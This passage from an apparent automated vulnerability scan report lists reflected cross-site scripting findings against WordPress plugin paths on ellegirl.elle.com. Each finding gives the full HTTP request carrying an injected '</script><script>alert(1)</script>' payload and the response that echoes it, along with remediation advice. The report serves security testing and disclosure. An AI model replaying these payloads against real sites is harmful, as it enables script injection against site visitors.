Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:44 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30545
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:48 GMT
Date: Sat, 17 Sep 2011 16:34:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins3febf</script><script>alert(1)</script>88390bc0032/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7
...[SNIP]...
4.131. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc232</script><script>alert(1)</script>d45f55e5bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-editionbc232</script><script>alert(1)</script>d45f55e5bc/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30544
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:17 GMT
Date: Sat, 17 Sep 2011 16:36:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
ent.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-editionbc232</script><script>alert(1)</script>d45f55e5bc/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document
...[SNIP]...
4.132. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e331d</script><script>alert(1)</script>4c767f6f499 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-edition/scriptse331d</script><script>alert(1)</script>4c767f6f499/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:37 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30545
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:41 GMT
Date: Sat, 17 Sep 2011 16:37:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
e;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-edition/scriptse331d</script><script>alert(1)</script>4c767f6f499/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.locatio
...[SNIP]...
4.133. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af073</script><script>alert(1)</script>21d92ae32d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.jsaf073</script><script>alert(1)</script>21d92ae32d?show_linkback=false&ver=1.4.9 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:38:53 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30544
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:38:56 GMT
Date: Sat, 17 Sep 2011 16:38:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
op5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.jsaf073</script><script>alert(1)</script>21d92ae32d?show_linkback=false&ver=1.4.9';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***********
...[SNIP]...
4.134. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 967ca</script><script>alert(1)</script>ea529146ddf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content967ca</script><script>alert(1)</script>ea529146ddf/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:04 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30530
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:08 GMT
Date: Sat, 17 Sep 2011 16:33:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content967ca</script><script>alert(1)</script>ea529146ddf/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:
...[SNIP]...
4.135. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f128e</script><script>alert(1)</script>dc0255cd7ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/pluginsf128e</script><script>alert(1)</script>dc0255cd7ed/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:40 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30530
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:43 GMT
Date: Sat, 17 Sep 2011 16:34:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/pluginsf128e</script><script>alert(1)</script>dc0255cd7ed/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';

...[SNIP]...
4.136. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d87</script><script>alert(1)</script>50600442b42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-edition32d87</script><script>alert(1)</script>50600442b42/scripts/jquery.lightbox.plugin.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:15 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30530
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:17 GMT
Date: Sat, 17 Sep 2011 16:36:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
ent.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-edition32d87</script><script>alert(1)</script>50600442b42/scripts/jquery.lightbox.plugin.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;
...[SNIP]...
4.137. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17f69</script><script>alert(1)</script>bef828970dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-edition/scripts17f69</script><script>alert(1)</script>bef828970dd/jquery.lightbox.plugin.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:50 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30530
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:54 GMT
Date: Sat, 17 Sep 2011 16:37:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
e;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-edition/scripts17f69</script><script>alert(1)</script>bef828970dd/jquery.lightbox.plugin.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***
...[SNIP]...
4.138. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45d58</script><script>alert(1)</script>35cd289fc80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js45d58</script><script>alert(1)</script>35cd289fc80?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:10 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30530
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:13 GMT
Date: Sat, 17 Sep 2011 16:39:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js45d58</script><script>alert(1)</script>35cd289fc80?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHI
...[SNIP]...
4.139. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdcf3</script><script>alert(1)</script>c25d258aed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-contentfdcf3</script><script>alert(1)</script>c25d258aed/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:23 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30631
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:27 GMT
Date: Sat, 17 Sep 2011 16:33:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-contentfdcf3</script><script>alert(1)</script>c25d258aed/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0';
//s.evar
...[SNIP]...
4.140. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc38</script><script>alert(1)</script>85842f0ecfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins1bc38</script><script>alert(1)</script>85842f0ecfc/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:35:06 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30632
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:35:11 GMT
Date: Sat, 17 Sep 2011 16:35:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins1bc38</script><script>alert(1)</script>85842f0ecfc/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0';
//s.evar3 = '';
...[SNIP]...
4.141. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a53</script><script>alert(1)</script>0b0634e9d94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-214a53</script><script>alert(1)</script>0b0634e9d94/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
